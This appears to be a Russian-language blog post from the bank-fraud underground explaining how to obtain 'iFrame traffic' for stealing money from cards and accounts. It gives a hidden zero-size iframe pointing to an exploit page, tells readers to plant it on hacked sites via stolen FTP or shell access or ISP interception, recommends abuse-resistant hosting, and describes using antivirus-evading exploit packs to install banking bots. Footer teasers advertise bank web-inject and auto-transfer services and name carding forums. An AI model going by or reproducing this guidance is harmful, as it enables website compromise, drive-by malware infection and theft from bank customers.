Skip to main content

Залив на карту или счёт и зачем нужен iFrame трафик


Трафик - на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф - это смешаный трафик нескольких стран стразу.

Для чего нужен трафик?
В своей основе iFrame трафик дроповоды и реальные заливщики денег на карты и счета используют для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

Где взять трафик?
Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок...

Чтобы иметь трафик дроповодам нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме - это самый надёжный вариант.

Для чего мне нужны FTP и Shell и что мне с ними делать?
iFrame - это код HTML внутри страницы. С помощью iFrame дроповод может вставлять один HTML документ в другой! Проще говоря, iFrame - это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:
<iframe src="http://site.ru/sploit.php" width="0" height="0" frameborder="0"></iframe>
где:
http://site.ru/sploit.php- это сайт на который пользователи site.ru будут заходить одновременно
width="0" длина равна 0
height="0" высота равна 0
frameborder="0" граница фрейма равна 0

Что делать с Iframe?
Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

Что нужно для продажи трафика?
Есть такая штука, как TDS - Traffic Direct System, - это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
Ну вот и всё, теперь поговорим про загрузки.

Что же такое эти загрузки?
Загрузки - это загрузка и запуск файла на компьютере клиента банка или простого лоха, - один из самых распространённых методов распространения банковских ботов в Интернет.



Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов...

Загрузки - это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

Что нам нужно для того чтобы делать загрузки?
Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

Теперь про связку сплоитов
Exploit - это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

Что же такое пробив связки?
Пробив - это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился - тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

Как делать загрузки?
Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site/svjzka.php - значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

Comments

Popular posts from this blog

Как найти инвестора для ФОРЕКС?

Сейчас есть много трейдеров, которые торгуют на рынке форекс довольно успешно уже более полугода или нескольких лет, и хотят оперировать более крупными суммами (сотнями тысяч евро), однако отсутствие собственных средств такого размера заставляет их идти другим путём – искать частного инвестора, готового вложить в них свой капитал.




Есть несколько условий, которые помогут вам быстрее найти инвестора и убедить его вложиться в вас. По большей части – выполнение этих условий зависит от самого трейдера, то есть от вас.

Своего первого инвестора я нашел случайно, продавая дебетовые карты Связной-Банк, но потом он отошел от дел в связи с напряженной ситуацией в данной сфере, и я решил поискать партнера на форумах, повесив рекламу на darkmoney.ccforum.fxclub.org и beznal.cc



Мне начали поступать предложения разных категорий...

1. Некоторые просят показать, как я получаю прибыль от 1.000.000 USD в день и только после этого им хотелось начинать воспринимать меня как успешного трейдера.

2. Реальные ин…

Как найти заливщика на карту

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево, но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли?

Ко мне начал обращаться народ обращается разных категорий

1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса 
2. Реальные мэны, которые льют сразу большую сумму по SWIFT без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личности, берущие реквизиты …

Кокаин попал в меня во время секса

Чемпион мира по прыжкам с шестом Шон Барбер не нарушил спортивных правил и имел право выступать на Олимпиаде в Рио-де-Жанейро, несмотря на положительную допинг-пробу на кокаин. Как заявила Федерация легкой атлетики Канады, наркотик попал в организм спортсмена без его ведома.

В случае признания виновным Барберу угрожала дисквалификация со стороны Канадского центра по этике в спорте сроком до двух лет. Комиссии, рассматривавшей его дело 5 августа, он сообщил, что наркотик попал в его организм через поцелуй.

22-летний атлет рассказал, что вечером накануне национального отборочного турнира Олимпиады-2016 он разместил анкету на сайте знакомств в интернете, где написал, что ищет случайной связи с девушкой "чистой от наркотиков и болезней".

Как выяснилось в ходе разбирательства, Барбер искал секса для того, чтобы снять нервное напряжение. Женщина, с которой он имел контакт, пояснила, что употребляла наркотик перед свиданием, а во время их встречи поцеловала атлета несколько раз, н…

Обзор инжектов и автозаливов

Не так давно в украинском сегменте интернета появился новый сервис по написанию автозаливов (АЗ) и инжектов. 

Судя по рекламным объявлениям ребята работают более двух лет в этой сфере и гарантируют высокое качество выпускаемого программного продукта, с возможностью реализовать практически любые задумки заказчика.

Основной спектр услуг этой компании довольно большой.

GRABBER
Баланс
Залив – АЗ любой сложности, независимо от того что нужно для залива (актив и пассив)
Данные на вход 
Обходы на входе 
Обходы внутри (токена, ридера и так далее, даже если валид тайм меньше минуты)
Реплэйсеры 
Подмены баланса любой сложности, с проверкой списания, расчетом баланса в траншах

ADMIN PANEL
Grabber
АЗ
Обходов
Подмен и всего остального

С каждым новым инжектом база технологий совершенствуется, имеется множество уникальных js прототипов, php фрэймворков и т.д., ниже представленная коллекция постоянно пополняется новыми и свежими идеями.  Они больше не используют куки, ajax в обычном смысле его понимания, - можете заб…

Как проверить, что полезная нагрузка может подключиться к машине с Metasploit, расположенной за NAT

Если вы проводите тестирование на проникновение и работаете в сети, где раздается NAT, например из дома через маршрутизатор беспроводной сети, то вам необходимо настроить проброс портов на своем маршрутизаторе, чтобы полезная нагрузка могла подключиться к машине с Metasploit.

Лучшим вариантом было подключиться к Интернету напрямую с белым IP адресом, но это слишком затратно. Настройка переадресации портов не так уж и сложна, но проверить её работоспособность может быть немного сложнее. Жалко только что данный подход нельзя использовать при работе через 3G модем, потому как ему изначально присваивается серый IP адрес и конечно же доступа к маршрутизатору провайдера для настройки проброса портов у вас нет.

В нашем случае виртуальная машина с установленным Metasploit Pro имеет IP-адрес 192.168.1.169. Выберем порт 4444 в качестве рабочего порта для нашей полезной нагрузки, чтобы избежать путаницы. Я буду показывать пример на маршрутизаторе Asus, ваш маршрутизатор конечно же может иметь д…